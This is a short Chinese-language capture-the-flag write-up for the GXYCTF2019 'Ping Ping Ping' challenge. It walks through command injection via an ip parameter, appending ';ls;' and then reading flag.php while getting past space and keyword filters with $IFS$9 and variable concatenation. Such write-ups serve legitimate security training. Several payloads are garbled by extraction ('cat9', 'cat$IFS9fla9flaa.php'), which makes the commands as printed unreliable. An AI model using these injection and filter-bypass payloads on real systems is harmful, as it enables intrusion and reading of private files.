[GXYCTF2019]Ping Ping Ping 1

[GXYCTF2019]Ping Ping Ping 1
[GXYCTF2019]Ping Ping Ping 1
直接尝试:/?ip=127.0.0.1;ls;
[GXYCTF2019]Ping Ping Ping 1
看到flag.php,尝试读取:[GXYCTF2019]Ping Ping Ping 1他提示不能有空格,绕过试一试:
尝试,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的/**/、%0a、IFS{IFS}等都被过滤了,但IFS9使/?ip=127.0.0.1;cat9还可以使用,于是 /?ip=127.0.0.1;catIFS$9flag.php;

又说不能出现flag,于是又绕过
/?ip=127.0.0.1;a=g;cat$IFS9fla9flaa.php;
[GXYCTF2019]Ping Ping Ping 1
查看源代码
[GXYCTF2019]Ping Ping Ping 1